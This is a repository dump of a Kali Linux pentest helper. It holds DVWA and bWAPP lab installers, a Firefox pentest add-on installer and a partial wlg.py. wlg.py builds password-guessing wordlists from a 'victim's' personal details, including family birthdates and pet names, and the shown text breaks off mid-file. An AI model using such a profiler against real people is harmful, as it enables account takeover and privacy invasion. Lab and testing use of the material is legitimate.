├── ScreenShot ├── Screenshot from 2017-09-19 05-24-22.png ├── Screenshot from 2017-09-19 05-24-46.png ├── Screenshot from 2017-09-19 05-24-53.png ├── Screenshot from 2017-09-19 05-25-10.png ├── Screenshot from 2017-09-19 05-25-22.png ├── Screenshot from 2017-09-19 05-25-37.png ├── Screenshot from 2017-09-19 05-25-53.png ├── Screenshot from 2017-09-19 05-26-18.png ├── Screenshot from 2017-09-19 05-26-36.png ├── Screenshot from 2017-09-19 05-27-00.png ├── Screenshot from 2017-09-19 05-27-14.png ├── Screenshot from 2017-09-19 05-27-29.png ├── Screenshot from 2017-09-19 05-27-47.png ├── Screenshot from 2017-09-19 05-28-00.png ├── Screenshot from 2017-09-19 05-28-15.png ├── Screenshot from 2017-09-19 05-28-34.png ├── Screenshot from 2017-09-19 05-28-48.png ├── Screenshot from 2017-09-19 05-29-07.png ├── Screenshot from 2017-09-19 05-29-21.png ├── Screenshot from 2017-09-19 05-30-53.png ├── Screenshot from 2017-09-19 05-31-16.png └── Screenshot from 2017-09-19 05-31-25.png ├── README.md ├── install-dvwa.sh ├── install-bwapp.sh ├── firefox-security.sh ├── wlg.py ├── fap.pl └── Exploitation-platform.sh /ScreenShot/Screenshot from 2017-09-19 05-24-22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-24-22.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-24-46.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-24-46.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-24-53.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-24-53.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-25-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-25-10.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-25-22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-25-22.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-25-37.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-25-37.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-25-53.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-25-53.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-26-18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-26-18.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-26-36.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-26-36.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-27-00.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-27-00.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-27-14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-27-14.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-27-29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-27-29.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-27-47.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-27-47.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-28-00.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-28-00.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-28-15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-28-15.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-28-34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-28-34.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-28-48.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-28-48.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-29-07.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-29-07.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-29-21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-29-21.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-30-53.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-30-53.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-31-16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-31-16.png -------------------------------------------------------------------------------- /ScreenShot/Screenshot from 2017-09-19 05-31-25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prodject/Download-Hacker-HOME/HEAD/ScreenShot/Screenshot from 2017-09-19 05-31-25.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Download hacker home (DHH..v10.5.1) 2 | - Tool ScreenShot 3 | 4 | ![DHH](https://scontent.fjrs3-1.fna.fbcdn.net/v/t1.0-9/21742955_161049551144059_1087540975273153600_n.jpg?oh=356bfc97d6ebb2baa724b727e226aba4&oe=5A6000D3) 5 | 6 | - Welcome To DHH Tool: 7 | 8 | # what is DHH Tool 9 | 10 | DHH she a tool that has been programmed 11 | To help hackers on penetration 12 | and she also helps those who do not have enough experience in the Kali Linux system on penetration easily 13 | This tool is best for [Kali linux] 14 | 15 | In order to download the best penetration testing tools and penetration easily 16 | 17 | It will save you a lot of time 18 | 19 | Just use it you will like it 20 | 21 | The tool is under constant development :) 22 | 23 | ------------------------------------------ 24 | 25 | # HOW YOU INSTALL THE TOOL 26 | 27 | 1 > open your termnal 28 | 29 | 2 > and type this command> git clone https://github.com/Oseid/Download-Hacker-HOME.git 30 | 31 | After it ends 32 | 33 | 3 > type this command> cd Dawonloa-Hacker-HOME/ 34 | 35 | 4 > and type this command> chmod +x * 36 | 37 | Download complete! 38 | 39 | # How to run tool 40 | 41 | Easy type this command> ./DHH.sh 42 | 43 | 44 | # END that's all :) 45 | 46 | For Help Please Visit My Account[ https://www.facebook.com/profile.php?id=100017170449859 ] and tell me what the problem is 47 | 48 | The tool is under constant development :) 49 | 50 | BY [Oseid Aldary] 51 | 52 | thanks for using 53 | 54 | have a nice day, goodbye :) 55 | -------------------------------------------------------------------------------- /install-dvwa.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | function clone(){ 4 | echo "Make sure that you have php 5 installed on your system" 5 | echo "Cloning latest version of DVWA from GitHub" 6 | git clone https://github.com/ethicalhack3r/DVWA.git $webroot/dvwa 7 | echo "Setting dvwa configuration" 8 | sudo chmod -R 777 $webroot/dvwa 9 | sed -i '2 c $dvwa_WEBROOT = "'$webroot'";' $webroot/dvwa/config/config.inc.php 10 | sed -i '17 c $_DVWA[ 'db_user' ] = "'$uname'";' $webroot/dvwa/config/config.inc.php 11 | sed -i '18 c $_DVWA[ 'db_password' ] = "'$pass'";' $webroot/dvwa/config/config.inc.php 12 | 13 | #creating database 14 | echo "Creating dvwa database" 15 | mysql -u $uname -p$pass -e "CREATE DATABASE IF NOT EXISTS dvwa" 16 | echo "dvwa Setup Finished Successfully. Happy hacking and happy learning !" 17 | } 18 | 19 | 20 | #checking mysql is installed 21 | isMYSQL=$(apt-cache show mysql-server | grep 'Version'); 22 | if [[ $isMYSQL == *"No packages found"* ]]; then 23 | echo -n "MySQL Package Not Found. Do you want to install (Y/N)?" 24 | read mysql_flag 25 | if [ $mysql_flag == "Y" ] || [ $mysql_flag == "y" ]; then 26 | echo "Installing MySQL Server. This might take a while." 27 | sudo apt-get install mysql-server 28 | else 29 | echo "dvwa Setup Terminated. MySQL is a must requirement for dvwa to run" 30 | exit 0 31 | fi 32 | else 33 | echo "MySQL found with "$isMYSQL 34 | fi 35 | #checking apache is installed 36 | isApache=$(apt-cache show apache2 | grep 'Version'); 37 | if [[ $isApache == *"No packages found"* ]]; then 38 | echo -n "Apache Package Not Found. Do you want to install (Y/N)?" 39 | read apache_flag 40 | if [ $apache_flag == "Y" ] || [ $apache_flag == "y" ]; then 41 | echo "Installing Apache. This might take a while." 42 | sudo apt-get install apache2 43 | else 44 | echo "dvwa Setup Terminated. Apache is a must requirement for dvwa to run" 45 | exit 0 46 | fi 47 | else 48 | echo "Apache found with "$isApache 49 | fi 50 | 51 | #asserting mysql and apache services 52 | MYSQL=$(pgrep mysql | wc -l); 53 | if [ "$MYSQL" -eq 0 ]; then 54 | echo "MySQL is down. Starting MySQL Service"; 55 | sudo service mysql start 56 | fi 57 | APACHE=$(pgrep apache | wc -l); 58 | if [ "$APACHE" -eq 0 ]; then 59 | echo "Apache is down. Starting Apache Service"; 60 | sudo service apache2 start 61 | fi 62 | 63 | #configuring mysql and apache for dvwa 64 | echo -n "Enter mysql username : " 65 | read uname 66 | echo -n "Enter mysql password : " 67 | read pass 68 | echo -n "Enter the full web root path : " 69 | read webroot 70 | 71 | #cloning latest version of dvwa from GitHub 72 | if [[ -d $webroot/dvwa ]]; then 73 | echo -n "Folder "$webroot"/dvwa already exists. Do you want to clean and build a fresh latest copy ? (Y/N)" 74 | read clean_flag 75 | if [ $clean_flag == "Y" ] || [ $clean_flag == "y"]; then 76 | echo "Cleaning up old copy" 77 | rm -rf $webroot/dvwa 78 | clone 79 | else 80 | echo "dvwa Setup Terminated." 81 | fi 82 | else 83 | clone 84 | fi 85 | -------------------------------------------------------------------------------- /install-bwapp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | function clone(){ 4 | echo "Make sure that you have php 5 installed on your system" 5 | echo "Cloning latest version of bwapp from Sourceforge" 6 | wget http://nchc.dl.sourceforge.net/project/bwapp/bWAPP/bWAPP_latest.zip 7 | unzip bWAPP_latest.zip 8 | mv bWAPP/ bwapp 9 | mv bwapp /var/www/html 10 | rm -rf apache2 11 | rm -rf evil 12 | rm bWAPP_latest.zip 13 | rm bWAPP_intro.pdf ClientAccessPolicy.xml crossdomain.xml INSTALL.txt README.txt release_notes.txt 14 | echo "Setting bwapp configuration" 15 | sudo chmod -R 777 $webroot/bwapp 16 | sed -i '2 c $bwapp_WEBROOT = "'$webroot'";' $webroot/bwapp/admin/settings.php 17 | sed -i '21 c $db_username = "'$uname'";' $webroot/bwapp/admin/settings.php 18 | sed -i '22 c $db_password = "'$pass'";' $webroot/bwapp/admin/settings.php 19 | 20 | 21 | echo "bwapp Setup Finished Successfully. Happy hacking and happy learning !" 22 | } 23 | 24 | 25 | #checking mysql is installed 26 | isMYSQL=$(apt-cache show mysql-server | grep 'Version'); 27 | if [[ $isMYSQL == *"No packages found"* ]]; then 28 | echo -n "MySQL Package Not Found. Do you want to install (Y/N)?" 29 | read mysql_flag 30 | if [ $mysql_flag == "Y" ] || [ $mysql_flag == "y" ]; then 31 | echo "Installing MySQL Server. This might take a while." 32 | sudo apt-get install mysql-server 33 | else 34 | echo "bwapp Setup Terminated. MySQL is a must requirement for bwapp to run" 35 | exit 0 36 | fi 37 | else 38 | echo "MySQL found with "$isMYSQL 39 | fi 40 | #checking apache is installed 41 | isApache=$(apt-cache show apache2 | grep 'Version'); 42 | if [[ $isApache == *"No packages found"* ]]; then 43 | echo -n "Apache Package Not Found. Do you want to install (Y/N)?" 44 | read apache_flag 45 | if [ $apache_flag == "Y" ] || [ $apache_flag == "y" ]; then 46 | echo "Installing Apache. This might take a while." 47 | sudo apt-get install apache2 48 | else 49 | echo "bwapp Setup Terminated. Apache is a must requirement for bwapp to run" 50 | exit 0 51 | fi 52 | else 53 | echo "Apache found with "$isApache 54 | fi 55 | 56 | #asserting mysql and apache services 57 | MYSQL=$(pgrep mysql | wc -l); 58 | if [ "$MYSQL" -eq 0 ]; then 59 | echo "MySQL is down. Starting MySQL Service"; 60 | sudo service mysql start 61 | fi 62 | APACHE=$(pgrep apache | wc -l); 63 | if [ "$APACHE" -eq 0 ]; then 64 | echo "Apache is down. Starting Apache Service"; 65 | sudo service apache2 start 66 | fi 67 | 68 | #configuring mysql and apache for bwapp 69 | echo -n "Enter mysql username : " 70 | read uname 71 | echo -n "Enter mysql password : " 72 | read pass 73 | echo -n "Enter the full web root path : " 74 | read webroot 75 | 76 | #cloning latest version of bwapp from GitHub 77 | if [[ -d $webroot/bwapp ]]; then 78 | echo -n "Folder "$webroot"/bwapp already exists. Do you want to clean and build a fresh latest copy ? (Y/N)" 79 | read clean_flag 80 | if [ $clean_flag == "Y" ] || [ $clean_flag == "y"]; then 81 | echo "Cleaning up old copy" 82 | rm -rf $webroot/bwapp 83 | clone 84 | else 85 | echo "bwapp Setup Terminated." 86 | fi 87 | else 88 | clone 89 | fi 90 | -------------------------------------------------------------------------------- /firefox-security.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ################################################################################## 3 | ##Firefox Security Toolkit 4 | ###Description: 5 | #This script automatically transform Firefox Browser to a penetration testing suite. The script mainly focuses on downloading the required addons for web-application penetration testing. 6 | ###Version: 7 | #v0.4 8 | ###Homepage: 9 | #https://github.com/mazen160/Firefox-Security-Toolkit 10 | ###Author: 11 | #Mazin Ahmed 12 | ################################################################################### 13 | 14 | RED=$(tput setaf 1 && tput bold) 15 | GREEN=$(tput setaf 2 && tput bold) 16 | STAND=$(tput sgr0) 17 | BLUE=$(tput setaf 6 && tput bold) 18 | echo "" 19 | echo "" 20 | echo "" 21 | 22 | 23 | clear 24 | 25 | 26 | echo ""$GREEN 27 | logo() { 28 | echo ' ______ _ ____ _____ _ __ ______ __ __ __ _ __ ' 29 | echo ' / ____/(_)_____ ___ / __/____ _ __ / ___/ ___ _____ __ __ _____ (_)/ /_ __ __ /_ __/____ ____ / // //_/ (_)/ /_' 30 | echo ' / /_ / // ___// _ \ / /_ / __ \ | |/_/ \__ \ / _ \ / ___// / / // ___// // __// / / / / / / __ \ / __ \ / // ,< / // __/' 31 | echo ' / __/ / // / / __// __// /_/ /_> < ___/ // __// /__ / /_/ // / / // /_ / /_/ / / / / /_/ // /_/ // // /| | / // /_ ' 32 | echo '/_/ /_//_/ \___//_/ \____//_/|_| /____/ \___/ \___/ \__,_//_/ /_/ \__/ \__, / /_/ \____/ \____//_//_/ |_|/_/ \__/ '$RED 33 | echo ' /____/ ' 34 | echo -e " _ __ __ _ _ _ _ " 35 | echo -e " | |__ _ _ _ | \/ | __ _ ___(_)_ __ / \ | |__ _ __ ___ ___ __| | " 36 | echo -e " | '_ \| | | (_) | |\/| |/ _\` |_ / | '_ \ / _ \ | '_ \| '_ \` _ \ / _ \/ _\` | " 37 | echo -e " | |_) | |_| |_ | | | | (_| |/ /| | | | | / ___ \| | | | | | | | | __/ (_| | " 38 | echo -e " |_.__/ \__, (_) |_| |_|\__,_/___|_|_| |_| /_/ \_\_| |_|_| |_| |_|\___|\__,_| " 39 | echo -e " |___/ "$BLUE 40 | echo -e "v0.4" 41 | echo -e "\t\t\t\t\twww.mazinahmed.net" 42 | echo -e "\t\t\t\t\ttwitter.com/mazen160" 43 | echo -e "\t\t\t\t\tae.linkedin.com/pub/mazin-ahmed/86/795/629" 44 | echo -e "\n\n" 45 | } 46 | 47 | logo 48 | 49 | welcome() { 50 | echo -e "\n\n" 51 | echo -e "Usage:\n\t bash $0 run\n\n" 52 | echo -e '[%%] Available Addons:' 53 | echo '# Cookie Export/Import 54 | # Cookie Manager 55 | # Copy as Plain Text 56 | # Crypto Fox 57 | # CSRF-Finder 58 | # Disable WebRTC 59 | # FireBug 60 | # Fireforce 61 | # FlagFox 62 | # Foxy Proxy 63 | # HackBar 64 | # Live HTTP Headers 65 | # Multi Fox 66 | # PassiveRecon 67 | # Right-Click XSS 68 | # Tamper Data 69 | # User Agent Switcher 70 | # Wappalyzer 71 | # Web Developer 72 | ' 73 | echo -e '[%%] Additions Features:' 74 | echo -e '# Downloading Burp Suite Certificate' 75 | echo -e '# Downloading a large user-agent list for User-Agent Swithcer' 76 | echo -e "\n\n" 77 | echo "[$] Legal Disclaimer: Usage of Firefox Security Toolkit for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program" 78 | 79 | } 80 | 81 | if [[ $1 != 'run' ]];then 82 | welcome 83 | exit 84 | fi 85 | 86 | burp_cert() { 87 | wget "http://127.0.0.1:$burp_port/cert" -o /dev/null -O "$scriptpath/cacert.der" ; if [ -s "$scriptpath/cacert.der" ] ; then echo -e "[*] Burp Suite certificate has been downloaded, and can be found at [$scriptpath/cacert.der]."; else echo "[!]Error: Firefox Security Toolkit was not able to download Burp Suite certificate, you need to do this task manually." ; fi 88 | } 89 | 90 | ##Checking whether Firefox is installed. 91 | if ! [ -f /usr/bin/firefox ]; then 92 | echo -e "[*] Firefox does not seem to be installed.\n[*]Quitting..." 93 | exit 94 | fi 95 | 96 | 97 | echo -en "[#] Click [Enter] to start. "; read -r 98 | 99 | ##Creating a tmp directory. 100 | scriptpath=$(mktemp -d) 101 | echo -e "[*] Created a tmp directory at [$scriptpath]." 102 | 103 | ##Inserting the "Installation is Finished page" into $scriptpath 104 | echo '

Installation is Finished

You can close Firefox.

Firefox Security Toolkit

' > "$scriptpath/.installation_finished.html" 105 | 106 | 107 | ##Asks about whether the user would like to download Burpsuite Certificate. 108 | echo -n "[@] Would you like to download Burp Suite Certificate? [y/n]. (Note that Burp Suite should be running in your machine): "; read -r burp_cert_answer 109 | if [[ ( $burp_cert_answer == 'y' ) || ( $burp_cert_answer == 'Y' ) || ( $burp_cert_answer == 'yes' ) ]];then 110 | 111 | echo -n "[@] Enter Burp Suite proxy listener's port (Default: 8080): "; read -r burp_port; if [[ $burp_port == '' ]]; then burp_port='8080' ; fi 112 | burp_cert 113 | fi 114 | 115 | ####Downloading packages. 116 | echo -e "[*] Downloading Addons." 117 | 118 | #Copy as Plain Text 119 | wget "https://addons.mozilla.org/firefox/downloads/latest/copy-as-plain-text/addon-344925-latest.xpi" -o /dev/null -O "$scriptpath/copy_as_plain_text.xpi" 120 | 121 | #Web Developer 122 | wget "https://addons.mozilla.org/firefox/downloads/latest/web-developer/addon-60-latest.xpi" -o /dev/null -O "$scriptpath/web_developer.xpi" 123 | 124 | #Tamper Data 125 | wget "https://addons.mozilla.org/firefox/downloads/latest/tamper-data/addon-966-latest.xpi" -o /dev/null -O "$scriptpath/tamper_data.xpi" 126 | 127 | #User Agent Switcher 128 | wget "https://addons.mozilla.org/firefox/downloads/latest/user-agent-switcher/addon-59-latest.xpi" -o /dev/null -O "$scriptpath/user_agent_switcher.xpi" 129 | 130 | #Right-Click XSS 131 | wget "https://addons.mozilla.org/firefox/downloads/file/215802/rightclickxss-0.2.1-fx.xpi" -o /dev/null -O "$scriptpath/right_click_xss.xpi" 132 | 133 | #Foxy Proxy 134 | wget "https://addons.mozilla.org/firefox/downloads/file/319162/foxyproxy_standard-4.5.5-sm+tb+fx.xpi" -o /dev/null -O "$scriptpath/foxy_proxy.xpi" 135 | 136 | #HackBar 137 | wget "https://addons.mozilla.org/firefox/downloads/latest/3899/addon-3899-latest.xpi" -o /dev/null -O "$scriptpath/hackbar.xpi" 138 | 139 | #Wappalyzer 140 | wget "https://addons.mozilla.org/firefox/downloads/latest/wappalyzer/addon-10229-latest.xpi" -o /dev/null -O "$scriptpath/wappalyzer.xpi" 141 | 142 | #PassiveRecon 143 | wget "https://addons.mozilla.org/firefox/downloads/latest/6196/addon-6196-latest.xpi" -o /dev/null -O "$scriptpath/passiverecon.xpi" 144 | 145 | #Cookie Manager+ 146 | wget "https://addons.mozilla.org/firefox/downloads/latest/92079/addon-92079-latest.xpi" -o /dev/null -O "$scriptpath/cookiemanager+.xpi" 147 | 148 | #Cookie Export/Import 149 | wget "https://addons.mozilla.org/firefox/downloads/latest/344927/addon-344927-latest.xpi" -o /dev/null -O "$scriptpath/cookie_export_import.xpi" 150 | 151 | #FlagFox 152 | wget "https://addons.mozilla.org/firefox/downloads/latest/5791/addon-5791-latest.xpi" -o /dev/null -O "$scriptpath/flagfox.xpi" 153 | 154 | #Fireforce 155 | wget "https://addons.mozilla.org/firefox/downloads/file/204186/fireforce-2.2-fx.xpi" -o /dev/null -O "$scriptpath/fireforce.xpi" 156 | 157 | #CSRF-Finder 158 | wget "https://addons.mozilla.org/firefox/downloads/file/224182/csrf_finder-1.2-fx.xpi" -o /dev/null -O "$scriptpath/csrf_finder.xpi" 159 | 160 | #Multi Fox 161 | wget "https://addons.mozilla.org/firefox/downloads/latest/200283/addon-200283-latest.xpi" -o /dev/null -O "$scriptpath/multifox.xpi" 162 | 163 | #FireBug 164 | wget "https://addons.mozilla.org/firefox/downloads/latest/1843/addon-1843-latest.xpi" -o /dev/null -O "$scriptpath/firebug.xpi" 165 | 166 | #Live HTTP Headers 167 | wget "https://addons.mozilla.org/firefox/downloads/file/345004/live_http_headers_fixed_by_danyialshahid-0.17.1-signed-sm+fx.xpi" -o /dev/null -O "$scriptpath/live_http_headers.xpi" 168 | 169 | #Crypto Fox 170 | wget "https://addons.mozilla.org/firefox/downloads/file/140447/cryptofox-2.2-fx.xpi" -o /dev/null -O "$scriptpath/crypto_fox.xpi" 171 | 172 | #Disable WebRTC 173 | wget "https://addons.mozilla.org/firefox/downloads/latest/497366/addon-497366-latest.xpi" -o /dev/null -O "$scriptpath/disable_webrtc.xpi" 174 | 175 | ###Ask about whether to download user-agent list for User-Agent Switcher addon 176 | echo -n "[@] Would you like to download user-agent list for User-Agent Switcher Addon? [y/n]"; read -r useragent_list_answer 177 | if [[ ( $useragent_list_answer == 'y' ) || ( $useragent_list_answer == 'Y' ) || ( $useragent_list_answer == 'yes' ) ]]; then 178 | wget 'http://techpatterns.com/downloads/firefox/useragentswitcher.xml' -o /dev/null -O "$scriptpath/useragentswitcher.xml" ; echo -e "[*]Additional User-Agnets has been downloaded for Default User-Agent Addon, you can import it manually. It can be found at: [$scriptpath/useragentswitcher.xml]." 179 | fi 180 | 181 | 182 | ####Messages. 183 | echo -e "[*] Downloading addons has been finished.\n"; 184 | echo -en "[@@] Click [Enter] to run Firefox to finish the task. (Note that Firefox will be restarted) "; read -r 185 | echo -e "[*] Running Firefox to install the addons.\n" 186 | ##Installing The Addons. The process needs to be semi-manually due to Mozilla Firefox security policies. 187 | #Stopping Firefox if it's running. 188 | killall firefox &> /dev/null 189 | #Running it again. 190 | /usr/bin/firefox "$scriptpath/"*.xpi "$scriptpath/.installation_finished.html" &> /dev/null 191 | #### 192 | 193 | ##In case you need to delete the tmp directory, uncomment the following line. 194 | #rm -rf "$scriptpath"; echo -e "[*]Deleted the tmp directory." 195 | echo -e "[**] Firefox Security Toolkit is finished\n" 196 | echo -e "Have a nice day! - Mazin Ahmed" 197 | ######################################################################## 198 | 199 | -------------------------------------------------------------------------------- /wlg.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import os 5 | 6 | 7 | 8 | 9 | 10 | #COLORS================ 11 | BLUE = '\033[94m' 12 | RED = '\033[91m' 13 | GREEN = '\033[32m' 14 | WHITE = '\033[0m' 15 | ORANGE = '\033[33m' 16 | BUS = '\033[34m' 17 | #====================== 18 | 19 | 20 | 21 | # ---------------------------- 22 | # framework banner 23 | # --------------------------- 24 | 25 | print GREEN+"#============================================================================#" 26 | print RED+" " 27 | print RED+" _ _ _ _ " 28 | print RED+" | | | (_) | | " 29 | print RED+" __ _____ _ __ __| | | |_ ___| |_ __ _ ___ _ __ " 30 | print RED+" \ \ /\ / / _ \| '__/ _` | | | / __| __| / _` |/ _ \ '_ \ " 31 | print RED+" \ V V / (_) | | | (_| | | | \__ \ |_ | (_| | __/ | | | " 32 | print RED+" \_/\_/ \___/|_| \__,_| |_|_|___/\__| \__, |\___|_| |_| " 33 | print RED+" __/ | " 34 | print RED+" |___/ " 35 | print BLUE+" by: Oseid Aldary " 36 | print GREEN+" " 37 | print GREEN+" " 38 | print GREEN+" " 39 | print GREEN+" " 40 | print GREEN+"#============================================================================#" 41 | print "" 42 | print "" 43 | print BUS+"[*] [Enter target info]:"+WHITE+" to make a word list for you :)\n" 44 | print ORANGE+"[*] If you don't know all the info, just hit enter when asked!\r\n" 45 | 46 | 47 | 48 | 49 | 50 | # -------------------------------- 51 | # start script functions 52 | # -------------------------------- 53 | surname = raw_input(GREEN+">>"+RED+" Enter Target Surname:> ") 54 | print "" 55 | nick = raw_input(RED+">>"+BLUE+" Enter Target Nickname:> ") 56 | print "" 57 | birthdate = raw_input(BLUE+">>"+GREEN+" Enter target Birthdate:> ") 58 | print "" 59 | print "-----------------------------------------------------------" 60 | wife = raw_input(GREEN+">>"+RED+" Wife's(husband's) name:> ") 61 | print "" 62 | wifen = raw_input(RED+">>"+BLUE+" Wife's(husband's) nickname:> ") 63 | print "" 64 | wifeb = raw_input(BLUE+">>"+RED+" Wife's(husband's) birthdate :> ") 65 | print "" 66 | print "-----------------------------------------------------------" 67 | kid = raw_input(RED+">>"+GREEN+" Child's name :> ") 68 | print "" 69 | kidn = raw_input(GREEN+">>"+RED+" Child's nickname :> ") 70 | print "" 71 | kidb = raw_input(RED+">>"+BLUE+" Child's birthdate :> ") 72 | print "" 73 | pet = raw_input(BLUE+">>"+RED+" Pet's name:> ") 74 | print "" 75 | company = raw_input(RED+">>"+GREEN+" Company name:> ") 76 | 77 | print "" 78 | words = [''] 79 | oth = raw_input("> Do you want to add some key words about the victim? [Y/N]: ") 80 | if oth == "y" or oth == "Y": 81 | words = raw_input("> Please enter the words, separated by comma. [i.e. hacker, security, Oseid]: ").split(", ") 82 | 83 | print "----------------------------------------------------------------------------" 84 | print "" 85 | name = raw_input(RED+">>"+GREEN+" Enter Name for save wordlist file:> ") 86 | print "" 87 | if len(name) == 0 or name == " " or name == " " or name == " ": 88 | print RED+"\r\n[x] You must enter a name at least!" 89 | print RED+"[X] Now exiting...\r\n" 90 | print WHITE+"" 91 | sys.exit() 92 | 93 | 94 | 95 | 96 | print BUS+"\r\n[*] [please wait]:"+WHITE+" making a dictionary..." 97 | 98 | 99 | # ---------------------------------------- 100 | # Now me must do some string modifications 101 | # ---------------------------------------- 102 | birthdate_yy = birthdate[-2:] 103 | birthdate_yyy = birthdate[-3:] 104 | birthdate_yyyy = birthdate[-4:] 105 | birthdate_xd = birthdate[1:2] 106 | birthdate_xm = birthdate[3:4] 107 | birthdate_dd = birthdate[:2] 108 | birthdate_mm = birthdate[2:4] 109 | 110 | wifeb_yy = wifeb[-2:] 111 | wifeb_yyy = wifeb[-3:] 112 | wifeb_yyyy = wifeb[-4:] 113 | wifeb_xd = wifeb[1:2] 114 | wifeb_xm = wifeb[3:4] 115 | wifeb_dd = wifeb[:2] 116 | wifeb_mm = wifeb[2:4] 117 | 118 | kidb_yy = kidb[-2:] 119 | kidb_yyy = kidb[-3:] 120 | kidb_yyyy = kidb[-4:] 121 | kidb_xd = kidb[1:2] 122 | kidb_xm = kidb[3:4] 123 | kidb_dd = kidb[:2] 124 | kidb_mm = kidb[2:4] 125 | 126 | # ---------------------------------- 127 | # Convert first letters to uppercase 128 | # ---------------------------------- 129 | nameup = name.title() 130 | surnameup = surname.title() 131 | nickup = nick.title() 132 | wifeup = wife.title() 133 | wifenup = wifen.title() 134 | kidup = kid.title() 135 | kidnup = kidn.title() 136 | petup = pet.title() 137 | companyup = company.title() 138 | wordsup = [] 139 | for words1 in words: 140 | wordsup.append(words1.title()) 141 | 142 | word = words+wordsup 143 | 144 | # ------------------------------ 145 | # reverse a name 146 | # ----------------------------- 147 | rev_name = name[::-1] 148 | rev_nameup = nameup[::-1] 149 | rev_nick = nick[::-1] 150 | rev_nickup = nickup[::-1] 151 | rev_wife = wife[::-1] 152 | rev_wifeup = wifeup[::-1] 153 | rev_kid = kid[::-1] 154 | rev_kidup = kidup[::-1] 155 | 156 | reverse = [rev_name, rev_nameup, rev_nick, rev_nickup, rev_wife, rev_wifeup, rev_kid, rev_kidup] 157 | rev_n = [rev_name, rev_nameup, rev_nick, rev_nickup] 158 | rev_w = [rev_wife, rev_wifeup] 159 | 